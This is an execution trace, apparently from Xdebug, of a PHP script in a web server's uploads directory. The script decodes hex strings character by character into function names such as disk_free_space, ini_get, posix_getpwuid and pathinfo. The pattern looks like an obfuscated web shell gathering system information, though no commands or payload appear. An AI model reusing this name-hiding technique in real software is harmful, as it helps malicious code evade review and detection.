2		A						/var/www/html/uploads/index.php	177	$i += 2
3	576	0	0.021611	584160	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	576	1	0.021623	584208
3	576	R			115
3	577	0	0.021635	584128	chr	0		/var/www/html/uploads/index.php	178	1	115
3	577	1	0.021646	584168
3	577	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	578	0	0.021676	584160	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	578	1	0.021688	584208
3	578	R			112
3	579	0	0.021704	584128	chr	0		/var/www/html/uploads/index.php	178	1	112
3	579	1	0.021716	584168
3	579	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	580	0	0.021746	584160	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	580	1	0.021757	584208
3	580	R			97
3	581	0	0.021770	584128	chr	0		/var/www/html/uploads/index.php	178	1	97
3	581	1	0.021782	584168
3	581	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	582	0	0.021813	584160	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	582	1	0.021825	584208
3	582	R			99
3	583	0	0.021837	584128	chr	0		/var/www/html/uploads/index.php	178	1	99
3	583	1	0.021848	584168
3	583	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	584	0	0.021879	584160	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	584	1	0.021890	584208
3	584	R			101
3	585	0	0.021903	584128	chr	0		/var/www/html/uploads/index.php	178	1	101
3	585	1	0.021915	584168
3	585	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	553	1	0.021945	584136
2	553	R			'disk_total_space'
1		A						/var/www/html/uploads/index.php	8	$func[29] = 'disk_total_space'
1		A						/var/www/html/uploads/index.php	7	$i++
2	586	0	0.021980	584136	dehex	1		/var/www/html/uploads/index.php	8	1	'6469736b5f667265655f7370616365'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 29
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	587	0	0.022023	584168	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	587	1	0.022035	584216
3	587	R			100
3	588	0	0.022048	584136	chr	0		/var/www/html/uploads/index.php	178	1	100
3	588	1	0.022059	584176
3	588	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	589	0	0.022090	584200	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	589	1	0.022102	584248
3	589	R			105
3	590	0	0.022115	584168	chr	0		/var/www/html/uploads/index.php	178	1	105
3	590	1	0.022126	584208
3	590	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	591	0	0.022157	584200	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	591	1	0.022169	584248
3	591	R			115
3	592	0	0.022181	584168	chr	0		/var/www/html/uploads/index.php	178	1	115
3	592	1	0.022193	584208
3	592	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	593	0	0.022223	584200	hexdec	0		/var/www/html/uploads/index.php	178	1	'6b'
3	593	1	0.022235	584248
3	593	R			107
3	594	0	0.022248	584168	chr	0		/var/www/html/uploads/index.php	178	1	107
3	594	1	0.022259	584208
3	594	R			'k'
2		A						/var/www/html/uploads/index.php	178	$r .= 'k'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	595	0	0.022289	584200	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	595	1	0.022301	584248
3	595	R			95
3	596	0	0.022314	584168	chr	0		/var/www/html/uploads/index.php	178	1	95
3	596	1	0.022325	584208
3	596	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	597	0	0.022356	584200	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	597	1	0.022368	584248
3	597	R			102
3	598	0	0.022380	584168	chr	0		/var/www/html/uploads/index.php	178	1	102
3	598	1	0.022391	584208
3	598	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	599	0	0.022421	584200	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	599	1	0.022436	584248
3	599	R			114
3	600	0	0.022449	584168	chr	0		/var/www/html/uploads/index.php	178	1	114
3	600	1	0.022460	584208
3	600	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	601	0	0.022491	584200	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	601	1	0.022503	584248
3	601	R			101
3	602	0	0.022515	584168	chr	0		/var/www/html/uploads/index.php	178	1	101
3	602	1	0.022526	584208
3	602	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	603	0	0.022557	584208	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	603	1	0.022568	584256
3	603	R			101
3	604	0	0.022581	584176	chr	0		/var/www/html/uploads/index.php	178	1	101
3	604	1	0.022592	584216
3	604	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	605	0	0.022622	584208	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	605	1	0.022634	584256
3	605	R			95
3	606	0	0.022646	584176	chr	0		/var/www/html/uploads/index.php	178	1	95
3	606	1	0.022657	584216
3	606	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	607	0	0.022688	584208	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	607	1	0.022700	584256
3	607	R			115
3	608	0	0.022712	584176	chr	0		/var/www/html/uploads/index.php	178	1	115
3	608	1	0.022723	584216
3	608	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	609	0	0.022754	584208	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	609	1	0.022765	584256
3	609	R			112
3	610	0	0.022778	584176	chr	0		/var/www/html/uploads/index.php	178	1	112
3	610	1	0.022789	584216
3	610	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	611	0	0.022819	584208	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	611	1	0.022831	584256
3	611	R			97
3	612	0	0.022843	584176	chr	0		/var/www/html/uploads/index.php	178	1	97
3	612	1	0.022855	584216
3	612	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	613	0	0.022885	584208	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	613	1	0.022896	584256
3	613	R			99
3	614	0	0.022909	584176	chr	0		/var/www/html/uploads/index.php	178	1	99
3	614	1	0.022920	584216
3	614	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	615	0	0.022950	584208	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	615	1	0.022962	584256
3	615	R			101
3	616	0	0.022974	584176	chr	0		/var/www/html/uploads/index.php	178	1	101
3	616	1	0.022985	584216
3	616	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	586	1	0.023016	584176
2	586	R			'disk_free_space'
1		A						/var/www/html/uploads/index.php	8	$func[30] = 'disk_free_space'
1		A						/var/www/html/uploads/index.php	7	$i++
2	617	0	0.023051	584176	dehex	1		/var/www/html/uploads/index.php	8	1	'696e695f676574'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 13
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	618	0	0.023092	584208	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	618	1	0.023103	584256
3	618	R			105
3	619	0	0.023116	584176	chr	0		/var/www/html/uploads/index.php	178	1	105
3	619	1	0.023127	584216
3	619	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	620	0	0.023158	584240	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	620	1	0.023176	584288
3	620	R			110
3	621	0	0.023188	584208	chr	0		/var/www/html/uploads/index.php	178	1	110
3	621	1	0.023200	584248
3	621	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	622	0	0.023231	584240	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	622	1	0.023242	584288
3	622	R			105
3	623	0	0.023255	584208	chr	0		/var/www/html/uploads/index.php	178	1	105
3	623	1	0.023266	584248
3	623	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	624	0	0.023296	584240	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	624	1	0.023308	584288
3	624	R			95
3	625	0	0.023320	584208	chr	0		/var/www/html/uploads/index.php	178	1	95
3	625	1	0.023332	584248
3	625	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	626	0	0.023362	584240	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	626	1	0.023373	584288
3	626	R			103
3	627	0	0.023386	584208	chr	0		/var/www/html/uploads/index.php	178	1	103
3	627	1	0.023397	584248
3	627	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	628	0	0.023428	584240	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	628	1	0.023440	584288
3	628	R			101
3	629	0	0.023452	584208	chr	0		/var/www/html/uploads/index.php	178	1	101
3	629	1	0.023464	584248
3	629	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	630	0	0.023494	584240	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	630	1	0.023505	584288
3	630	R			116
3	631	0	0.023518	584208	chr	0		/var/www/html/uploads/index.php	178	1	116
3	631	1	0.023529	584248
3	631	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	617	1	0.023559	584208
2	617	R			'ini_get'
1		A						/var/www/html/uploads/index.php	8	$func[31] = 'ini_get'
1		A						/var/www/html/uploads/index.php	7	$i++
2	632	0	0.023593	584208	dehex	1		/var/www/html/uploads/index.php	8	1	'707265675f6d617463685f616c6c'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 27
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	633	0	0.023635	584240	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	633	1	0.023647	584288
3	633	R			112
3	634	0	0.023659	584208	chr	0		/var/www/html/uploads/index.php	178	1	112
3	634	1	0.023671	584248
3	634	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	635	0	0.023702	584272	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	635	1	0.023714	584320
3	635	R			114
3	636	0	0.023726	584240	chr	0		/var/www/html/uploads/index.php	178	1	114
3	636	1	0.023738	584280
3	636	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	637	0	0.023768	584272	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	637	1	0.023780	584320
3	637	R			101
3	638	0	0.023792	584240	chr	0		/var/www/html/uploads/index.php	178	1	101
3	638	1	0.023803	584280
3	638	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	639	0	0.023834	584272	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	639	1	0.023845	584320
3	639	R			103
3	640	0	0.023858	584240	chr	0		/var/www/html/uploads/index.php	178	1	103
3	640	1	0.023869	584280
3	640	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	641	0	0.023902	584272	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	641	1	0.023915	584320
3	641	R			95
3	642	0	0.023927	584240	chr	0		/var/www/html/uploads/index.php	178	1	95
3	642	1	0.023938	584280
3	642	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	643	0	0.023969	584272	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	643	1	0.023981	584320
3	643	R			109
3	644	0	0.023993	584240	chr	0		/var/www/html/uploads/index.php	178	1	109
3	644	1	0.024004	584280
3	644	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	645	0	0.024034	584272	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	645	1	0.024046	584320
3	645	R			97
3	646	0	0.024058	584240	chr	0		/var/www/html/uploads/index.php	178	1	97
3	646	1	0.024070	584280
3	646	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	647	0	0.024101	584272	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	647	1	0.024112	584320
3	647	R			116
3	648	0	0.024125	584240	chr	0		/var/www/html/uploads/index.php	178	1	116
3	648	1	0.024136	584280
3	648	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	649	0	0.024166	584280	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	649	1	0.024177	584328
3	649	R			99
3	650	0	0.024190	584248	chr	0		/var/www/html/uploads/index.php	178	1	99
3	650	1	0.024201	584288
3	650	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	651	0	0.024231	584280	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	651	1	0.024243	584328
3	651	R			104
3	652	0	0.024255	584248	chr	0		/var/www/html/uploads/index.php	178	1	104
3	652	1	0.024267	584288
3	652	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	653	0	0.024297	584280	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	653	1	0.024309	584328
3	653	R			95
3	654	0	0.024321	584248	chr	0		/var/www/html/uploads/index.php	178	1	95
3	654	1	0.024333	584288
3	654	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	655	0	0.024363	584280	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	655	1	0.024375	584328
3	655	R			97
3	656	0	0.024387	584248	chr	0		/var/www/html/uploads/index.php	178	1	97
3	656	1	0.024399	584288
3	656	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	657	0	0.024467	584280	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	657	1	0.024481	584328
3	657	R			108
3	658	0	0.024494	584248	chr	0		/var/www/html/uploads/index.php	178	1	108
3	658	1	0.024505	584288
3	658	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	659	0	0.024536	584280	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	659	1	0.024548	584328
3	659	R			108
3	660	0	0.024561	584248	chr	0		/var/www/html/uploads/index.php	178	1	108
3	660	1	0.024573	584288
3	660	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	632	1	0.024603	584248
2	632	R			'preg_match_all'
1		A						/var/www/html/uploads/index.php	8	$func[32] = 'preg_match_all'
1		A						/var/www/html/uploads/index.php	7	$i++
2	661	0	0.024638	584248	dehex	1		/var/www/html/uploads/index.php	8	1	'706f7369785f6765747077756964'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 27
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	662	0	0.024687	584280	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	662	1	0.024699	584328
3	662	R			112
3	663	0	0.024711	584248	chr	0		/var/www/html/uploads/index.php	178	1	112
3	663	1	0.024723	584288
3	663	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	664	0	0.024754	584312	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	664	1	0.024766	584360
3	664	R			111
3	665	0	0.024779	584280	chr	0		/var/www/html/uploads/index.php	178	1	111
3	665	1	0.024790	584320
3	665	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	666	0	0.024821	584312	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	666	1	0.024832	584360
3	666	R			115
3	667	0	0.024845	584280	chr	0		/var/www/html/uploads/index.php	178	1	115
3	667	1	0.024856	584320
3	667	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	668	0	0.024887	584312	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	668	1	0.024899	584360
3	668	R			105
3	669	0	0.024912	584280	chr	0		/var/www/html/uploads/index.php	178	1	105
3	669	1	0.024923	584320
3	669	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	670	0	0.024953	584312	hexdec	0		/var/www/html/uploads/index.php	178	1	'78'
3	670	1	0.024965	584360
3	670	R			120
3	671	0	0.024978	584280	chr	0		/var/www/html/uploads/index.php	178	1	120
3	671	1	0.024989	584320
3	671	R			'x'
2		A						/var/www/html/uploads/index.php	178	$r .= 'x'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	672	0	0.025020	584312	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	672	1	0.025038	584360
3	672	R			95
3	673	0	0.025051	584280	chr	0		/var/www/html/uploads/index.php	178	1	95
3	673	1	0.025063	584320
3	673	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	674	0	0.025093	584312	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	674	1	0.025105	584360
3	674	R			103
3	675	0	0.025118	584280	chr	0		/var/www/html/uploads/index.php	178	1	103
3	675	1	0.025129	584320
3	675	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	676	0	0.025159	584312	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	676	1	0.025171	584360
3	676	R			101
3	677	0	0.025184	584280	chr	0		/var/www/html/uploads/index.php	178	1	101
3	677	1	0.025213	584320
3	677	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	678	0	0.025245	584320	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	678	1	0.025257	584368
3	678	R			116
3	679	0	0.025270	584288	chr	0		/var/www/html/uploads/index.php	178	1	116
3	679	1	0.025281	584328
3	679	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	680	0	0.025311	584320	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	680	1	0.025323	584368
3	680	R			112
3	681	0	0.025336	584288	chr	0		/var/www/html/uploads/index.php	178	1	112
3	681	1	0.025347	584328
3	681	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	682	0	0.025378	584320	hexdec	0		/var/www/html/uploads/index.php	178	1	'77'
3	682	1	0.025390	584368
3	682	R			119
3	683	0	0.025402	584288	chr	0		/var/www/html/uploads/index.php	178	1	119
3	683	1	0.025414	584328
3	683	R			'w'
2		A						/var/www/html/uploads/index.php	178	$r .= 'w'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	684	0	0.025448	584320	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	684	1	0.025460	584368
3	684	R			117
3	685	0	0.025472	584288	chr	0		/var/www/html/uploads/index.php	178	1	117
3	685	1	0.025483	584328
3	685	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	686	0	0.025513	584320	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	686	1	0.025525	584368
3	686	R			105
3	687	0	0.025537	584288	chr	0		/var/www/html/uploads/index.php	178	1	105
3	687	1	0.025549	584328
3	687	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	688	0	0.025579	584320	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	688	1	0.025591	584368
3	688	R			100
3	689	0	0.025603	584288	chr	0		/var/www/html/uploads/index.php	178	1	100
3	689	1	0.025615	584328
3	689	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	661	1	0.025645	584288
2	661	R			'posix_getpwuid'
1		A						/var/www/html/uploads/index.php	8	$func[33] = 'posix_getpwuid'
1		A						/var/www/html/uploads/index.php	7	$i++
2	690	0	0.025680	584288	dehex	1		/var/www/html/uploads/index.php	8	1	'706f7369785f6765746772676964'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 27
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	691	0	0.025723	584320	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	691	1	0.025735	584368
3	691	R			112
3	692	0	0.025747	584288	chr	0		/var/www/html/uploads/index.php	178	1	112
3	692	1	0.025759	584328
3	692	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	693	0	0.025790	584352	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	693	1	0.025802	584400
3	693	R			111
3	694	0	0.025815	584320	chr	0		/var/www/html/uploads/index.php	178	1	111
3	694	1	0.025826	584360
3	694	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	695	0	0.025858	584352	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	695	1	0.025870	584400
3	695	R			115
3	696	0	0.025883	584320	chr	0		/var/www/html/uploads/index.php	178	1	115
3	696	1	0.025895	584360
3	696	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	697	0	0.025926	584352	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	697	1	0.025938	584400
3	697	R			105
3	698	0	0.025951	584320	chr	0		/var/www/html/uploads/index.php	178	1	105
3	698	1	0.025964	584360
3	698	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	699	0	0.025994	584352	hexdec	0		/var/www/html/uploads/index.php	178	1	'78'
3	699	1	0.026006	584400
3	699	R			120
3	700	0	0.026018	584320	chr	0		/var/www/html/uploads/index.php	178	1	120
3	700	1	0.026030	584360
3	700	R			'x'
2		A						/var/www/html/uploads/index.php	178	$r .= 'x'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	701	0	0.026061	584352	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	701	1	0.026073	584400
3	701	R			95
3	702	0	0.026086	584320	chr	0		/var/www/html/uploads/index.php	178	1	95
3	702	1	0.026097	584360
3	702	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	703	0	0.026128	584352	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	703	1	0.026139	584400
3	703	R			103
3	704	0	0.026152	584320	chr	0		/var/www/html/uploads/index.php	178	1	103
3	704	1	0.026164	584360
3	704	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	705	0	0.026202	584352	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	705	1	0.026213	584400
3	705	R			101
3	706	0	0.026226	584320	chr	0		/var/www/html/uploads/index.php	178	1	101
3	706	1	0.026237	584360
3	706	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	707	0	0.026267	584360	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	707	1	0.026279	584408
3	707	R			116
3	708	0	0.026292	584328	chr	0		/var/www/html/uploads/index.php	178	1	116
3	708	1	0.026303	584368
3	708	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	709	0	0.026334	584360	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	709	1	0.026346	584408
3	709	R			103
3	710	0	0.026359	584328	chr	0		/var/www/html/uploads/index.php	178	1	103
3	710	1	0.026371	584368
3	710	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	711	0	0.026401	584360	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	711	1	0.026413	584408
3	711	R			114
3	712	0	0.026425	584328	chr	0		/var/www/html/uploads/index.php	178	1	114
3	712	1	0.026437	584368
3	712	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	713	0	0.026468	584360	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	713	1	0.026479	584408
3	713	R			103
3	714	0	0.026492	584328	chr	0		/var/www/html/uploads/index.php	178	1	103
3	714	1	0.026503	584368
3	714	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	715	0	0.026533	584360	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	715	1	0.026545	584408
3	715	R			105
3	716	0	0.026558	584328	chr	0		/var/www/html/uploads/index.php	178	1	105
3	716	1	0.026569	584368
3	716	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	717	0	0.026600	584360	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	717	1	0.026612	584408
3	717	R			100
3	718	0	0.026624	584328	chr	0		/var/www/html/uploads/index.php	178	1	100
3	718	1	0.026636	584368
3	718	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	690	1	0.026667	584328
2	690	R			'posix_getgrgid'
1		A						/var/www/html/uploads/index.php	8	$func[34] = 'posix_getgrgid'
1		A						/var/www/html/uploads/index.php	7	$i++
2	719	0	0.026703	584328	dehex	1		/var/www/html/uploads/index.php	8	1	'70617468696e666f'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 15
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	720	0	0.026745	584360	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	720	1	0.026757	584408
3	720	R			112
3	721	0	0.026770	584328	chr	0		/var/www/html/uploads/index.php	178	1	112
3	721	1	0.026781	584368
3	721	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	722	0	0.026812	584392	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	722	1	0.026824	584440
3	722	R			97
3	723	0	0.026836	584360	chr	0		/var/www/html/uploads/index.php	178	1	97
3	723	1	0.026848	584400
3	723	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	724	0	0.026879	584392	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	724	1	0.026891	584440
3	724	R			116
3	725	0	0.026903	584360	chr	0		/var/www/html/uploads/index.php	178	1	116
3	725	1	0.026919	584400
3	725	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	726	0	0.026950	584392	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	726	1	0.026962	584440
3	726	R			104
3	727	0	0.026974	584360	chr	0		/var/www/html/uploads/index.php	178	1	104
3	727	1	0.026985	584400
3	727	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
